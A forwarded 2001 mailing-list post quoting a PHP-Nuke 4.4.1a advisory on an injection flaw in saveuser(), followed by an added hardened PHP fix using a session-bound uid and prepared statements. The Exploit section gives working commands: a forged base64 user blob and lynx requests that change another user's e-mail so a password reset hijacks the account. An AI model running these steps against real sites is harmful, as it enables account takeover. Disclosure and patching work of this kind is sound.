Any of the devel guys work on this one? It's been all over bugtraq.... Probably one of the most insecure php programs in a long time.

----- Original Message -----
From: "venomous" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, March 02, 2001 6:44 AM
Subject: PHPNUKE4.4.1a Advisory

> r 0 t t e n d e v 1 c e C r e w
> r0tten dev1ce Crew
>
> A r g e n t i n i a n S e c u r i t y G r o u p
> Argentinian Security Group
>
> <[( advisory )]>---------------------------------------<[(
> rdC270201.adv.en
>
> Program: PHP-NUKE
> Vendor Homepage: http://www.phpnuke.org
> Vendor Contacted: 27/feb/2001
> Vendor Response: ??/??/??
> Vendor Fix: ??/??/??
> Version tested: 4.4.1a (latest version to date)
> Found by: venomous
> English translation: ka0z
>
> - Problem description:
> ~~~~~~~~~~~~~~~~~~~~
>
> The checks that are realized in the function saveuser() are not
> enough to block arbitrary information being passed to the query of
> MySQL.
> [!] There are also many other functions that can be exploited the
> same way described in the advisory. This advisory describes only
> the function saveuser().
>
> - Impact:
> ~~~~~~~
>
> It's possible for the attacker to change the e-mail address of one
> of the users and ask for the password to be sent to the e-mail
> address that the attacker has provided.
> Of course this isn't easy since we do not know the UID of each of
> the users, but this type of information is easily obtained with
> bruteforce checks.
>
> - Exploit:
> ~~~~~~~~
>
> powerhouse:~$ /bin/echo -e "0:<user>:2:3:4:5:6:7:8:eee" | uuencode -m f
> begin-base64 644 f
> MDpBbm9ueW1vdXM6MjozOjQ6NTo2Ojc6ODplZWUK [***]
>
> lynx http://victim/user.php?op=saveuser&user=[***]&uid=X&uname=<user>
>
> The variables whose value you can change are:
>
> name='', email='', femail='', url='', bio='', user_avatar='',
> user_icq='', user_occ='', user_from='', user_intrest='',
> user_sig='', user_aim='', user_yim='', user_msnm=''
>
> In other words, if we want to change the e-mail address, we do:
>
> lynx http://victim/user.php&op=saveuser&user=[***]&uid=X&uname=<user>&email=<email you want>
>
> If you ask for the password to be sent to e-mail, you would be able
> to access the account.
>
> - Code:
> ~~~~~
>
> Very simple script to demonstrate the vulnerability:
>
> You can get it from http://www.rdcrew.com.ar, code section.
>
> - Fix:
> ~~~~
>
> Wait for a patch from the author.
>
>
> - Contact us:
> ~~~~~~~~~~~
>
> Advisories, tools, IDS, texts and other stuff can be found at:
> http://www.rdcrew.com.ar
>
>
> [EMAIL PROTECTED]
>
> - Greets:
> ~~~~~~~
>
> people: ka0z, den0, E|Bruj0, storm, ab.
> channels: #flatline at coredumped
> [EOF]
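The root cause described above is that saveuser() trusts the uid and uname carried in the client-supplied `user` blob and interpolates the profile fields into the UPDATE. The following is an added example of a hardened handler, written for this message and not PHP-Nuke's own code; it assumes a mysqli connection, a server-side session that stores the logged-in uid, the column names listed in the advisory, and a table called `nuke_users` (an assumption).

```php
<?php
// Added example (not PHP-Nuke code): the UPDATE is bound to the uid held
// in the server-side session; the "user=<base64 uid:uname:...>" blob and
// the "&uid=X" parameter from the request are never consulted.
// Assumptions: $db is a mysqli connection, $session['uid'] was set at
// login, and nuke_users has the columns listed in the advisory.

const EDITABLE_FIELDS = ['name', 'email', 'femail', 'url', 'bio',
    'user_avatar', 'user_icq', 'user_occ', 'user_from',
    'user_intrest', 'user_sig', 'user_aim', 'user_yim', 'user_msnm'];

function saveuser_hardened(mysqli $db, array $post, array $session): bool
{
    // 1. Authorisation comes only from the session; a request cannot
    //    choose which account it edits.
    if (empty($session['uid']) || !ctype_digit((string) $session['uid'])) {
        return false;                       // not logged in
    }
    $uid = (int) $session['uid'];

    // 2. Only allow-listed columns can be updated; anything else in the
    //    request is ignored instead of being spliced into the SQL text.
    $set = []; $values = []; $types = '';
    foreach (EDITABLE_FIELDS as $field) {
        if (!array_key_exists($field, $post)) {
            continue;
        }
        $value = (string) $post[$field];
        if ($field === 'email' && !filter_var($value, FILTER_VALIDATE_EMAIL)) {
            return false;                   // refuse a malformed e-mail
        }
        $set[]    = "`$field` = ?";         // name comes from the allow-list
        $values[] = $value;
        $types   .= 's';
    }
    if ($set === []) {
        return true;                        // nothing to change
    }

    // 3. Prepared statement: user data travels as bound parameters, so
    //    quotes or extra fields in a value cannot alter the query.
    $sql  = 'UPDATE nuke_users SET ' . implode(', ', $set) . ' WHERE uid = ?';
    $stmt = $db->prepare($sql);
    $types   .= 'i';
    $values[] = $uid;
    $stmt->bind_param($types, ...$values);
    return $stmt->execute();
}
```

With this shape, changing another user's e-mail requires that user's session, so the "change e-mail, then request the password" path in the Impact section no longer works from an unauthenticated request.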
